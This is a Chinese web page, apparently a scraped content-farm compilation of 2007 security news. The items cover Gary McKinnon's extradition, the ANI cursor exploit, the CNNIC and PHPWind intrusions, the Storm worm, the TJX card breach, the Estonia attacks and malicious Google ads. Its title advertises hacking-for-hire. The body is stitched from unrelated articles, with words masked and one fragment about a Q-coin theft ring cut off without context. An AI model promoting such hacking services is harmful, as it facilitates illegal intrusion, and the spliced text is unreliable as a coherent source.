黑客在线 *** 接单(专业黑客在线接单)
4月4日消息,英国一位被华盛顿指控制造了“有史以来更大一起入侵军事电脑案”的电脑专家,周二被驳回了不被引渡到美国接受审判的上诉请求。
据路透社报道,加里·麦克金农(Gary McKinnon)于2002年被捕,他被被指控非法侵入美国军方97个电脑系统,包括五角大楼、美国陆军、海军和美国国家航空和宇宙航行局(NASA)的系统,并造成了70万美元的损失。
英国高院的两名大法官驳回了麦克金农提出的上诉,此前法院对麦克金农的引渡命令获得了英国国防大臣约翰·里德(John Reid)的支持。
英国高法院院长莫里斯·凯(Maurice Kay)说:“我们认为他的上诉没有任何依据。”
“麦克金农先生的行为是蓄意且经过精细策划的,目的是利用胁迫手段来影响和骚扰美国 *** 。”
“他的行为破坏了电脑上软件、系统和数据的安全和正常运行,损害了它们的可靠性,并因此造成了损失。”
麦克金农的律师曾辩论说,将麦克金农引渡到美国有可能使他的人权受到侵犯,而且也不能容许对他的引渡基于因为他的国籍或政治观点而起诉的目的。
麦克金农承认入侵了美国 *** 的电脑,但拒绝承认造成了任何损失。他入侵美国电脑所使用的黑客名字为“Solo”。
在对麦克金农提出指控时,美国弗吉尼亚东区司法部副部长保罗·麦克诺提(Paul McNulty)说:“麦克金农先生被指控制造了有史以来更大一起入侵军事电脑案。
如果在美国被认定有罪,麦克金农将面临长达70年的监禁和更高175万美元的罚金。
麦克金农还有机会向英国上议院(House of Lords)对周二的裁定提出上诉。
4月4日消息,据国外媒体报道,美国能源部下属的反间谍管理局(DECD)日前表示,该部门丢失了20台计算机,其中至少14台存有机密信息。
DECD表示,其中14台计算机存有机密信息,而另外6台也“可能”含有机密信息。据悉,DECD隶属于美国能源部,主要负责保护核技术免被国外机构窃取。
事实上,这并不是DECD首次发生丢失计算机事件。早在2004年,该部门的一个实验室就丢失了约269台计算机。在过去的四年中,审计人员发现了十多起计算机丢失事件。而这些计算机都是用来处理与核技术相关的任务。
BBC报道说魔兽玩家已成为黑客集团的攻击目标,他们利用前不久刚公布的动态光标漏洞攻入目标主机,窃取玩家的WoW帐号。
据说今年二月曾有来自中国的黑客团伙攻入超级碗主站(美式橄榄球职业联赛),然后利用此网站扩散恶意代码,进而获得浏览者的系统控制权;一旦受害者启动WoW登录界面,此恶意代码即被激活,记录下玩家的帐号和密码然后发送给黑客团伙以便牟利。
根据赛门铁克的研究报告,黑客窃取一个信用卡帐号只能卖6美元,但一个WoW帐号至少可卖10美元,如果某个帐号同时拥有多个高等级人物,人物角色所持有的稀有物品将使其售价高得不可 *** 。
微软针对光标漏洞以异乎寻常的速度抢先发布ANI补丁,可惜这次好像有点忙中出错,补丁声声入耳,余音袅袅。
网易科技讯 4月16日消息 网易科技收到网民提供信息,中国互联 *** 信息中心 (CNNIC)服务器遭到黑客入侵,署名为“马骏”的黑客留言“鄙视CNNIC的流氓行为”,网易科技留意到这是“马骏”继华硕、东方卫士之后10天内入侵的第三个网站。
互联网安全人士对网易科技表示,CNNIC这次受到的入侵应该是服务器出现了安全漏洞,一些黑客看不惯CNNIC的“流氓行为”,以入侵表示自己的不满。从目前的情况看还没对CNNIC造成很大的实质危害,但估计该黑客会在入侵服务器后留下一个“后门”,为再次入侵提供通道,CNNIC的服务器很可能已被黑客完全掌控。如果CNNIC不能及时发现并补上该漏洞,入侵者一旦发动大规模攻击的话,CNNIC的服务器可能面临当机的危险。
该人士还透露,CNNIC的安全漏洞可以为黑客所利用,一些网民注册CN域名时提交数据过程中可能随时被劫持或更改资料。更大的危害是,如果入侵黑客在CNNIC服务器上挂马,那些安装了CNNIC插件的网民的电脑会同时感染了木马病毒,成为黑客的肉鸡。所幸的是,该入侵黑客似乎看起来只为了“出口恶气”,并没采取实际行动,否则后果不堪设想。
业内人士分析,CNNIC目前正大力推动100万网站开通中文.CN域名,如果CN域名随时能为黑客所劫持,无疑大大打击网民、企业注册CN域名的积极性。
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、 *** CHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。
据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显然,一次系统的安全隐患,已经波及整个中国互联网。
网易科技从PHPWind官方了解到,这次攻击主要针对大型站点,攻击工具的大肆传播也导致了攻击的影响范围扩大。市场部商务经理方舟称,从漏洞爆出,到大面积用户受损,仅仅几个小时的时间。传播速度如此之快,攻击如此有针对性,今天主力帮助系统——官方论坛,又被DDOS攻击,这不是个人能力所为。
PHPWind官方对于传播攻击工具,使用攻击工具导致其用户受损的人表示谴责。并表示已经报警,目前正在陆续收集相关证据和信息。PHPWind创始人王学集今天表示,向广大PHPWind的站长致以最深的歉意,并提出将在各个层面,尽全力维护站长权益。
网易科技就论坛安全的问题致电Discuz的产品经理李国德,他表示,论坛程序也像WINDOWS系统一样,有漏洞是再所难免,作为厂商来说只有尽力去做好防范,尽量去避免漏洞给用户造成损失。
4月9日消息,据国外媒体报道,苹果Apple TV机顶盒上市不到一个月就遭到全方位破解。日前有消息称,Apple TV被改造成了内置Mac OS X操作系统的廉价计算机。
据英国媒体报道,Apple TV经一度“跳票”后,终于于上周面世。AppleTV售价299美元,包括一个遥控器、TV本身和一根电源线。通过Wi-Fi或线缆连接到本地 *** 后,允许用户通过电视收看在线电影。
此外,Apple TV还可以回放来自iTunes音乐库的内容。但由于缺乏第三方电影的支持,“苹果迷”们早已耐不住寂寞,将其破解。破解后,AppleTV可以正常支持Xvid文件。
在此之前,还有用户将Apple TV的硬盘限制破解。Apple TV本来内置的是40G硬盘。破解后,用户可以给Apple TV配置更大容量的硬盘。
而如今,又有黑客将Mac OS X操作系统安装在Apple TV中。再配上USB键盘和鼠标,Apple TV就变成了不折不扣的廉价计算机。对于机顶盒而言,300美元的价格可能不算低。但如果是计算机,300美元应该是超值了。
台湾拥有250万会员、当地更大博客、电子相簿网站“无名小站”14日清晨5时到7时因系统管理出问题,造成会员以密码上锁的相簿被人随意浏览,大批个人私密照片曝光。
据香港《明报》报道,虽然网站已紧急处理,但仍造成会员一些与情人亲热照片或个人 *** 照片外泄。
台湾消费者文教基金会15日提醒民众,必须慎选网站使用,同时避免将个人隐私数据放在网上。
根据市场调查,“无名小站”是最受台湾年轻人喜爱的网站,它有个人博客、电子相簿及BBS三大部分,其中又以电子相簿更受欢迎。网民只要申请一组账号就可以 *** BBS、电子相簿及博客的50MB容量服务,若要更大容量则须缴交新台币499元年费。
由于“无名小站”拥有250万会员,很受广告商青睐,上月才被“Yahoo!奇摩”以6亿元收购。
不过,14日清晨有台湾网友发现“无名小站”的电子相簿出现严重问题,明明已锁码,可是却不用密码就可以轻易进入。一名女网友在电子相簿存放了她与历任男友亲密的照片,有些网友则是存放一些个人 *** 照片,他们都紧张万分,抱怨隐私照片在网上四处流散。
“无名小站”当天上午紧急发出通告称,最近因为相簿流量大增,网站正在展开增进效能的改善计划,“今天(14日)清晨的短暂时间中,相簿的系统有些问题,不过我们已经迅速处理完成,若还有任何问题请和我们回报表示”。
虽然失控为时只有两个小时,但网友还是很担心自己不想被人看到的照片外泄。有网友表示,如真的流传出去,不排除向网站索偿。
4月10日消息 据国外媒体报道,一黑客集团4月4日在Insecure.org网站上发表 *** 宣称,将发动一场反对伊朗的信息战争。
该黑客集团宣布,这一行动的部分筹备工作已在进行之中--在伊朗组织一个由许多感染了木马病毒的计算机所构成的 *** 。接下来,黑客们将会对伊朗的 *** 基础设施发动大规模的攻击行动--已于4月6日开始实施。根据这封 *** 所说,参与攻击行动的黑客来自美国、英国、挪威、法国、意大利、巴西和俄罗斯等国。
不过,俄罗斯的一些黑客组织表示反对发动攻击伊朗的行动。他们表示:“我们不但不会支持攻击伊朗计算机系统的行动,而且还会采取必要措施以提供这一 *** 国家 *** 系统的防护能力。”
据国家计算机病毒应急处理中心紧急提醒,近期微软的办公文字处理软件MS Office Word 2007出现三个新的致命漏洞,三个漏洞均达到“高度危险”级别,由于微软尚未发布补丁程序,用户须加倍小心。
以金山WPS为代表的国产办公软件顺势推出自己推广活动,以推动用户对国产办公软件的支持。据金山内部人士透露,WPS近期将推出下载WPS Office赠送金山毒霸两个月服务期的活动,主打安全牌。
业内分析人士称,在4月26日知识产权日前夕国家正在大力打击盗版软件,国产办公软件凭借足够满足用户办公需求的功能、低廉的价格(甚至长期免费试用)和本地化服务,正在赢得更多用户的认可。
高危漏洞可导致系统瘫痪
专家介绍,这些漏洞如果被恶意攻击者利用,很有可能会对受攻击的计算机系统产生类似于拒绝服务式攻击的恶果。例如,受攻击计算机系统的CPU占用量会达到100%,造成系统无法正常使用。同时可能会使恶意攻击在远程对受攻击的计算机系统执行任意代码,最终导致系统瘫痪。
由于目前微软尚未发布针对这三个漏洞的补丁程序,恶意攻击者很有可能用一个含有恶意代码的Word文档,诱使计算机用户下载或打开这个文件。一旦文件被打开,攻击者就可以对计算机系统进行一些远程控制,并进行一系列的破坏。
专家提醒,在微软没有发布针对这三个漏洞的补丁程序之前,用户如果使用的是微软的办公文字处理软件MS Office Word 2007,对上述问题一定要引起高度重视,不要随意打开陌生的Word文档,对不熟悉的文档更好立即删除掉,以免造成不可弥补的损失。
“微软在挑战用户耐心”
统计数据表明,自2004年以来,微软Office办公软件公布的漏洞就达上百个之多,特别是2007年新产品MS Office 2007发布后,更是一直陷入公布漏洞、发布补丁的恶性循环中,令许多用户不堪其扰,提心吊胆。
2007年2月27日,当微软公布2007版之一个高危漏洞时,一些专门从事安全的研究人员也表示,对微软刚发布的新产品就出现高危漏洞而感到意外。
而对于产生安全漏洞的程序架构上的深层原因,微软并未进行过系统的解释。一直标榜致力于最安全的软件产品的微软,似乎在挑战用户的耐心,而很多用户似乎并没有继续忍耐微软这个毛病的准备了。
Word频繁出漏洞给国产软件机会
一位致力于办公软件市场研究的专家指出,在MS Office 2007发布后,产品本身频繁出现高危漏洞的产品品质和其高达数千人民币的售价实在难以让人接受。许多用户在选择办公软件的时候,已经放弃MS Office转而通过其他办公软件产品。
据介绍,目前办公软件市场上,除了MS Office,金山WPS Office、永中Office、红旗中文等都是非常不错的选择,相对MS Office来说,这些国产软件不仅仅价格要便宜许多倍,甚至是长期免费试用,而且在使用上更能照顾中国用户的使用习惯。
其中金山的WPS Office安装包仅有19M、下载安装不到一分钟、与微软Office双向兼容,而且个人版长期免费试用——好用不好用,试试就知道。
据悉,金山WPS还将近期推出促销活动,凡下载WPS均可免费赠送金山毒霸2个月服务期的优惠活动。这些都是促使大量用户开始使用这款软件的原因。专家建议,在使用软件过程中,不妨货比三家,多做比较,选择最适合自己的产品。
4月17日国际报道 安全专家警告称,利用一个尚未修正的Windows安全漏洞的计算机代码的公开发布增加了大规模攻击爆发的可能性。
赛门铁克本周一在一份安全公告中说,上周末,至少有4种利用Windows DNS服务中该缺陷的代码被发布到了互联网上。赛门铁克将其ThreatCon提高到了2级,这意味着攻击可能性的增长。
该缺陷影响Windows 2000 Server 和Windows Server 2003。微软上周警告称,已经听说有“有限的攻击”发生,但是,利用该缺陷的恶意代码还没有被公开发布。
微软安全响应中心的一名员工克里斯托弗本周日在博客中写道,微软仍在开发补丁软件,攻击是有限的。他表示,我们已经得知,利用该缺陷的概念证明型恶意代码已经被公开发布到了互联网上。微软建议受影响的用户采取它提供的临时性解决方案。
据微软称,该缺陷不是通过标准的DNS 端口━━TCP/UDP 53被利用的。RPC界面通常被捆绑到1024-5000 间的 *** 端口上。
据SANS Internet Storm Center称,这减轻了受到攻击的危险。但是,这一问题仍然相当严重。Web 托管公司通常在一台服务器上运行有不同的 *** 服务。
这一DNS缺陷不会影响Windows XP或Windows Vista,但Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2会受到影响。
据新华社电 国家计算机病毒应急处理中心15日提醒,近期微软公司的办公文字处理软件Office Word 2007出现三个新的漏洞。
专家说,这三个漏洞中其中有两个若被恶意攻击者利用,很有可能会对受攻击的计算机系统产生类似于拒绝服务式攻击的恶果。
例如,受攻击计算机系统的CPU占用量会达到100%,造成系统无法正常使用。同时,第三个漏洞可能会使恶意攻击在远程对受攻击的计算机系统执行任意代码,最终导致系统瘫痪。
专家提醒,在微软公司没有发布针对这三个漏洞的补丁程序之前,广大计算机用户不要随意打开陌生的Word文档,对不熟悉的文档更好立即删除掉。
天极ChinaByte 4月16日消息(他山石 编译) 据国外媒体报道,今年微软公司Windows操作系统零天缺陷是潜在的、最严重的安全缺陷之一,微软报告称,在它的Windows服务器系统中发现了一个危险的零天缺陷。由于缺陷潜在的影响了企业 *** ,因此在服务器软件中利用这一缺陷进行的攻击被认为特别严重。
在公司的安全咨询中微软表示,在公司的Windows 2000 Server SP4、Windows Server 2003 SP1和Windows Server 2003 SP2软件中,这一缺陷影响了域名系统服务器提供的服务。
微软指出,公司最初的调查显示,这一缺陷试图允许攻击者运行域名系统服务器服务的相关安全代码。这些安全代码运行默认的当地系统。
到目前为止,除非用户提出强烈要求,微软还没有在在每月的安全补丁周期外发布专门解决这一缺陷的补丁。
4月16日至4月22日,一个与“熊猫烧香”非常相似的高危病毒值得特别关注,该病毒名为“ANI蠕虫(Worm.DlOnlineGames.a)”。
该病毒感染电脑后,会从网上下载多种木马、后门病毒,使得用户游戏等账号被盗,或者电脑变成被黑客控制的“肉鸡”。同时,染毒电脑还会发出大量带毒邮件,用户打开这些邮件就可能被病毒感染。
瑞星建议用户及时升级手中的瑞星杀毒软件2007版或下载到19.19版本。
据外电报道,继上周败诉后,英国黑客Gary McKinnon日前又提起了上诉,反对被引渡到美国。
据美国官方的证词,Gary McKinnon在2001年到2002年间共侵入了美国 *** 部门的97台电脑,直接或间接造成了高达70万美元的损失,美国当权局称其为迄今为止世界上更大的军用计算机入侵事件,包括美国武装军队、海军、国防部门甚至美国航空宇宙航行局(NASA)的计算机系统都遭到非法入侵,是继911事件以后,对国家安全更大的威胁。
这名苏格兰国籍的黑客今年41岁,之前从事计算机系统管理员的工作。在辩护词中,Gary McKinnon承认利用Perl编程语言获得登陆密码,曾经非法入侵过美国 *** 计算机系统。但同时,McKinnon也表示自己有权进入军用 *** 。他说自己只是个 *** 业余爱好者,入侵 *** 部门电脑 *** 也只是因好奇心作祟,想查看一下 *** 备案里UFO的相关资料。
除此之外,他强调,有相当多的黑客都入侵过 *** *** ,可以举出很多例子来,为什么美国 *** 只单单引渡他一个人。
McKinnon还指出,他侵入电脑所造成的任何经济或其他方面的损失,都绝对是意外,并非出自他的本意。
如果McKinnon的连续上诉都失败,法庭将最终裁决其罪名成立,引渡其到美国受审。McKinnon将在监狱里度过长达45年的时间。
一名10年前同样因计算机非法入侵被起诉的黑客Mathew Bevan则认为,根本问题不在于McKinnon,而是暴露了美国军事安全系统的弱点,责任在其整个部门,McKinnon则成了代罪羔羊。
Mathew Bevan在1997年被起诉非法入侵美国军用计算机系统。但在长达18个月案件审理中,Woolwich Crown法院最终未引渡Bevan。而此后,Bevan成了Tiger计算机安全公司的顾问,后来他又创建了自己的Kuji媒体公司。
Mathew Bevan指出,Gary McKinnon和他自己当初的控罪十分相似,只是政治背景不同。因为911恐怖事件的发生,美国政治相对紧张,McKinnon的引渡就是政治上的决定。但在美国庭审结束以后,McKinnon应该会被准许在英国服刑。
Mathew Bevan同McKinnon一样,非法入侵都是为了寻找 *** UFO的相关资料。而Bevan的案子被美国参议会当作了 *** 恐怖主义。
他认为美国军事计算机系统存在很大的漏洞,易收到攻击。
“美国军用 *** 安全跟10年相比,根本没什么提高。我相信除了获得批准的登陆以外,还有很多人都侵入过其系统。而美国 *** 暂时还未抓到真正意义上的 *** *** ,因此他们引渡McKinnon的目的更有可能在于杀一敬百。”
此外,美国当权局通过此案警告 *** 恐怖主义,以确保信息安全。
北京时间4月13日,据国外媒体最新报道,目前一种新蠕虫变种病毒正通过电子邮件传播,这种病毒可以避过杀毒软件程序的监控。在专家测试的31种杀毒软件中,只有4种软件报告病毒。
电子邮件安全机构Postini公司表示,在过去的24小时里,他们发现了550万封病毒软件,这是日平均量的60倍。之一批病毒软件拥有非常浪漫的主题:“A kiss so gentle”或“I dream of you”。而最新一批病毒软件由使用另外一些主题,例如“Worm Alert!”或“Virus Alert!”等,通过这些主题来欺骗读信者,这些电子邮件通过此举让用户以为他们已经中毒,而且电子邮件中的附件升级才是真的病毒。
国外著名计算机杂志《PC World》就收到许多此类带毒邮件。这些邮件的主题都是“Worm Alert!”。这些邮件中包含一份文档文件,其中带有图片,这样就能使邮件穿过反垃圾邮件工具过滤。附件则是一份密码保护文件,名为“patch- 7594.zip”,而密码就是文档文件中的内容。
失灵的杀毒软件
专家将邮件附件上传给Virustotal.com网站,这个网站拥有上传文件查毒服务。这个网站的31种杀毒软件中,只有4种软件--ClamAV、eSafe、卡巴斯基和赛门铁克报告了病毒。
据Postini公司透露,双击附件之后将会引发恶意程序的连续攻击。首先,rootkit 将试图隐藏恶意程序,用户和杀毒程序将无法检测到病毒。然后,蠕虫将会试图让杀毒程序失灵。之后,蠕虫程序将会连接到一个点对点 *** ,蠕虫制造者使用这种 *** 来发布命令。这些命令可能会下载更多恶意程序、发送垃圾邮件或从受攻击电脑中窃取个人数据。
最后,这种蠕虫程序还可以进一步传播给电脑中地址薄里的其它人。据Postini透露,为了避开杀毒软件和反垃圾邮件程序,这种蠕虫能够自我复制,还能够改变电子邮件主题、附件名称以及恶意程序属性。
正在壮大的蠕虫
这种蠕虫最早出现于今年1月份,最初这种蠕虫病毒隐藏在名为“230 dead as storm batters europe”的电子邮件中。据安全机构Commtouch公司透露,这种蠕虫在12天内已经制造出42000个变种病毒。如此大量蠕虫变种意味着传统的签名式反病毒程序需要做更多事情,反病毒程序必须知道每种变种病毒。
为了能够在目前的蠕虫爆发中受到安全保护,强烈建议用户不要打开任何未知邮件的附件,甚至某些已知邮件的附件也要谨慎对待。另外,用户需要确保适时更新杀毒程序。尽管大量杀毒软件目前仍然无法扫描出这些病毒变种,但是杀毒软件生产商们将会对他们的病毒库进行及时更新。
中新网4月12日电 新竹市香山高中学校网站去年12月遭 *** 黑客入侵,校长相片被换成薄纱美女清凉照、熊猫,学生选课资料被删除,新竹市警局刑警大队11日依 *** 地址查到黑客,发现是曾入侵光复中学网站发布寒假延长假公告被警查获的光复中学一年级吴姓学生,他说,破坏香山高中网页,纯属好玩。
据台湾《联合晚报》报道,香山高中学校网站去年12月起,先是校长相片被换成薄纱美女清凉照,校方还原后,又被黑客换成熊猫照,且黑客破坏行为日益严重。今年1月8日起,该校网站陆续发生20余个数据夹都被删除、网页无法连结、首页被黑客呛声“你不要再改了,再改也没有用”、选课资料被删,荣誉榜连结到游戏网页等,校方一再还原、安装防火墙,都被破坏,1月17日,整个网站竟被移除。
校方报警后,新竹市警局刑警大队侦1队科技犯罪小组将被入侵的主机硬盘拆下,送到刑事局追查,吴姓学生11日到案说明,承认香山高中的网页是他独自破坏的。他说,他从某网下载木马程序,利用学校网站公布栏的漏洞入侵香山高中网页,今年1至2月间多次修改网页内容,只是为了好玩。
警方指出,吴姓学生2月间也曾入侵光复中学网站,发布假行政公告让寒假多了5天,被警方查获,11日又查出香山高中网站也是他破坏的,警方将把他依妨害计算机使用罪函送法办,并从查扣的计算机扩大清查。
随着微软紧急安全补丁的发布,近来闹得沸沸扬扬的微软动态光标(ANI)漏洞攻击事件已经慢慢平息下去,不过损失非常惨重,迄今共有2000多家网站受到了影响。
3月29日,微软就此问题发布了安全公告,在其中披露了漏洞的很多资料,此后受感染网站数量猛增。虽然微软提前发布了补丁,但除非绝大多数公司和个人PC都进行升级,否则还会继续有更多网站受害。
*** 安全机构WebSense指出,这些网站要么自身带有恶意代码,要么会把用户转向恶意网站,总之都会导致用户的系统被攻击,而不肯及时更新的机器将成为今后的重点攻击目标,因为只要漏洞还有效,攻击就不会停止。
WebSense的统计显示,ANI漏洞攻击绝大部分都出现在中国和美国,另外在东欧也有不少。
自2006年1月微软开始每月集中发布安全补丁以来,这已经是第三次打破常规、提前行动了。
在美国这样金融系统高度发达的国家里,信用卡安全问题已引得人心惶惶
国际先驱导报记者张忠霞发自华盛顿这年头,谁钱包里没几张卡。刷卡,已经为越来越多的中国人所接受。可银行卡的安全漏洞却成为一个不得不说的隐患,就连美国这样金融系统高度发达的国家,动辄几千万人的卡资料外泄,也听得消费者心惊胆战。这样的安全状况,岂不是越刷心里越没底?
近日,美国折扣零售巨头TJX曝出4570万张信用卡和借记卡资料遭黑客窃取,成为美国迄今最严重的一次金融信息安全事件。
最严重的一次信息
TJX在1月初,曾对外透露公司电脑系统受到黑客侵袭。但直到3月30日晚间才提交给美国证券交易委员会档案文件,承认受到这一波黑客攻击影响的客户竟多达4570万——这还是保守估计。
TJX时隔如此之久才对外披露此事,令消费者十分震怒,但其以“安抚人心”的口吻解释说,黑客窃取的数据中有3/4可能是“无用数据”。因为他们的系统对数据进行了特殊加密,信用卡卡号中的数字部分用星号替代存储,另外有些卡片在黑客入侵之时已过有效期。
尽管TJX试图淡化事件的严重性,但此间安全专家显然不敢苟同。美国著名市场调查公司加特纳的分析师利坦就指出,“这是迄今更大的一起卡数据偷窃案,(给消费者)造成了相当严重的损害”。在此之前,最严重的一起信息泄露是2005年,卡系统公司4000万信用卡数据被黑客窃取。而且更让安全专家担心的是,黑客这次直接攻破了TJX的加密软件,“等于拿到了大门钥匙进去偷东西”。有安全专家指出,这次发生如此严重的信息安全事故,说明很多保管有消费者数据的公司,尤其是那些客户群庞大的零售巨头,信息安全系统漏洞百出。
地下经济,耸人听闻
美国媒体报道说,上周佛罗里达州警方在迈阿密逮捕了6人,涉嫌使用从其他人手中购买的TJX公司信用卡卡号疯狂消费,金额累计达100万美元。
由于 *** 交易活动的持续走高,数据盗窃日渐猖獗。2006年下半年,信息安全公司赛门铁克(Symantec)发现大约有600万台电脑被“可疑软件”感染。赛门铁克说,现在俨然已经形成地下的“ *** 经济”,黑客们已经从单兵作战变为有组织的犯罪团体,窃取来的数据资料通过一条“地下 *** 链”进行交易。
赛门铁克进行的一项为期6个月的数据泄露追踪调查发现,黑客窃取数据后,一般都把数据拿到网站上进行非法交易。据悉,一个信用卡卡号连带该卡安全码,大概售价在1到6美元之间。更详尽的个人资料,包括银行账户号码、出生日期、社会安全号(美国的身份认证号码),售价在14至18美元之间。
其他的黑市“电子交易”五花八门:获取一个Skype帐号,大约12美元,就可以花别人的钱打免费的;获取一个里面仍存有余额的支付账号,要价10美元到500美元不等,可以用他人账号进行 *** 购物……
“这是一个阴暗的在线交易 *** ”,赛门铁克的报告说。仅2006年下半年,他们就“监测”到有4943张信用卡资料被非法交易,由此导致的欺诈消费等损失可达数百万美元。
赛门铁克的调查显示,全球33%的黑客攻击活动源自美国、46%的欺诈性“钓鱼”网页设在美国,44%的垃圾邮件发自美国。美国无疑是黑客攻击的更大“毒窝”,于是也就成了数据黑市交易的“大本营”。
微软动态光标漏洞已经成为继“熊猫烧香”、灰鸽子之后的又一热门话题。伴随着微软MS07-017漏洞补丁的提前发布,利用该漏洞“挂马”的热度非但没有减弱,反而有大肆流行的趋势。4月10日,据江民反病毒中心统计数据显示,已有数千家恶意网站利用微软MS06-014和MS07-017两大漏洞挂马,上千万网民受害,MS07-017成为国内常用网站挂马漏洞第二,与“挂马王”MS06-014二者之和占到总体比例的97%-98%。
据江民反病毒专家介绍,从近10天来该漏洞的利用情况以及恶意ANI文件的感染率来看,MS07-017已经“荣登”挂马漏洞排行榜第二。有统计数据显示,挂马网站使用MS07-017漏洞的比例在10%-20%,使用MS06-014的比例在80%左右。虽然MS07-017距MS06-014仍有不小的差距,但MS07-017已经成功从MS06-014那里抢来了不少百分比,稳坐常用挂马漏洞的第二把交椅。同时从漏洞被发现后短短的10天里,利用MS07-017漏洞的恶意ANI文件感染率就超过了4%,即每25台染毒的计算机中就有一台检测出恶意ANI文件。由此不难看出,MS07-017漏洞并没有随着微软补丁的发布而真正淡出,这个严重漏洞对网民的威胁才刚刚开始。
反病毒专家建议用户及时打好微软MS07-017安全补丁,江民杀毒软件特为这个恶意ANI文件编写了广谱检测模块,用户只需及时将杀毒软件升级到最新病毒库,就可以完全拦截利用该漏洞挂马的恶意网站,同时用户上网时要打开“系统检测”及“网页监控”功能,确保上网安全。同时,为了保障用户上网安全,即日起,江民公司特在、和三地开展了“杀毒安全风暴”活动,以58元超低价格向当地用户 *** 原价228元的江民杀毒软件KV2007。
民警挖出主犯线索
警方随后发现,一个购物网站中的“堆金叠玉”和“寻缘寻缘”两个 *** 虚拟店铺以3.5折的低价大量兜售Q币,十分可疑。在警方讯问下,两名商家交代:这些Q币都是从四川一名用户家里批发来的。警方由此顺藤摸瓜,迅速对四川瑞华信息技术有限公司法人代表胥磊和员工陈雄章展开调查。同年4月底,两人在四川成都落网。
雇多名大学生盗充Q币
两人获得赃款70多万
据俄新社报道,爱沙尼亚 *** 新闻局4月28日凌晨宣布,从27日晚上开始, *** 官方网站遭到黑客攻击,曾在短时间内瘫痪,访问一度非常困难。
爱沙尼亚 *** 新闻部门透露,黑客们是从境外服务器上对爱 *** 官方网站发起攻击的,曾在一定时间内导致 *** 系统堵塞,网站访问受到较大限制,网页打开速度非常缓慢。爱沙尼亚移动通信运营商的客户们还收到了以 *** 名义发来的手机短信,内容稍后被 *** 当局斥为是“不可靠的”。 *** 通信局还要求公民保持警惕,必要时监督和举报所收到的不良信息。
据悉,境外黑客对爱沙尼亚 *** 官方网站的攻击开始于当局决定开始强行拆除位于首都中央的苏军解放塔林纪念碑之后,该决定引发了4月26日晚的首都骚乱,4月27日夜间塔林再次爆发大规模骚乱,数百人被捕。
据国外媒体报道,丹麦安全公司Secunia日前在Photoshop软件中发现了“高危”安全漏洞,允许黑客远程访问用户计算机。
丹麦安全公司Secunia日前表示,在Adobe Photoshop CS2和CS3版本中发现“高危”安全漏洞,可导致用户计算机被黑客远程攻击。
该漏洞主要存在于Photoshop处理BMP、DIB和RLE等位图文件的方式上,此时,黑客可以发动缓存溢出攻击,并植入恶意代码。
据悉,该漏洞最初是由法国安全研究员“Marsu”发现的,并且在Windows XP SP2测试过。目前,攻击代码已经被公布在互联网上。
Secunia建议,用户不要轻易用Photosho可疑位图文件。而Adobe目前正在调查此事。
上海、浙江等地近日陆续发生了网上银行个人账户资金被黑客盗取事件,被盗金额更高达到十几万元。北京江民公司的反病毒专家提醒,随着“五一”黄金周临近,通过网上银行购物的消费行为会大幅增加,消费者应当心“网银大盗”等病毒偷袭。
“网银大盗”是一种木马病毒,可以盗取多家网上银行及“支付宝”等系统的个人交易账户和密码。
据介绍,“网银大盗”主要通过6种方式发动攻击:假冒网上银行网站或者攻击网站服务器,骗取用户资料;记录键盘输入动作;嵌入浏览器,在电脑数据以安全加密方式发送之前盗取密码;通过屏幕录像偷窥用户输入密码的操作过程;窃取网上银行数字证书文件,自动记录用户资料;伪装网上银行弹出窗口,以系统更新或服务器繁忙等理由诱使用户将账号、密码发送到指定网站。
反病毒专家提醒,网民应养成良好的上网习惯:
———选购带主动防御、实时监控等功能的正版杀毒软件;
———及时安装微软发布的安全漏洞补丁,及时升级杀毒软件病毒库;
———电脑经常进行病毒全面清查,不要随意点击陌生网址、邮件,接收邮件时要打开杀毒软件的邮件监控功能;
———登录网上银行页面时,尽量直接在浏览器地址栏中输入网址,慎用搜索引擎;
———登录交易系统时使用软键盘,通过鼠标点击方式输入交易账号及密码,交易完成后及时退出网上交易系统。
圈中位置是谷歌向来赚钱的广告连接位,不过自从黑客事件后,网页暂时少了这一功能。
黑客犯罪手法
1 犯罪分子首先建立自己的网站
2 出高价在谷歌上登广告,这样广告就可以始终与搜索结果前几名同时出现。
3 一旦有用户点击这个“陷阱”广告,犯罪分子就能够跟踪并窃取他的信息。
据新华社电搜寻网站Google最近再度中招,被迫抽起与20多个常用检索词有关的赞助商广告链接,原因是它们被黑客故伎重演,通过跟踪在网上寻觅商业广告的用户,窃取他们的个人信息以及银行账户密码。若网民在检索时,不慎点击了这些状似搜寻结果的广告链接,随时可能被黑客盗取银行户口号码、密码等个人数据,蒙受金钱损失。
具体受害人数还不清楚
美国近日发生黑客盗窃事件,犯罪分子通过在谷歌网站上发布广告窃取用户银行账户和密码,目前具体被盗人数还不得而知。电脑安全专家表示本次黑客盗窃应属个人行为。“中招”的用户大多使用微软的Windows XP系统且未及时更新。
出售检索词赞助广告链接,是谷歌一个重要收入来源。仅今年之一季度,谷歌公司的广告盈利就达10亿美元。不过安全专家称,这次黑客盗窃并未破坏谷歌的商业广告业务。举例说,当网民输入car这个检索词,谷歌网站除了列出一系列查询结果外,还会在最上面列出汽车赞助商的广告链接,这次黑客就是利用这类广告链接作恶。
谷歌24日宣布已经中断犯罪分子使用的广告链接,并已冻结相关账户。目前,公司正与技术专家一同对其余链接严密排查,确保遭黑客渗透的链接能够被及时发现并隔离。及时发现黑客盗窃的是宾夕法尼亚州软件安全公司“安全漏洞防御实验室”,同时被发现的还有一系列针对谷歌网站的恶作剧程序。
各大网站敲响警钟
美国威瑞信公司技术专家肯·邓纳姆认为,此次黑客作案手段与2005年一起案件十分相似。当时一群犯罪分子注册了一个网站,并假借一著名零售公司之名在谷歌网页上发布广告。前去订购的用户被犯罪分子跟踪,然后犯罪分子盗取用户的银行卡密码,并窃取其他个人信息。邓纳姆认为,案件发生后谷歌应加强广告受理的认证力度,尤其对那些出大价钱登广告的客户。然而,他同时承认,对所有广告用户逐一调查开支巨大。
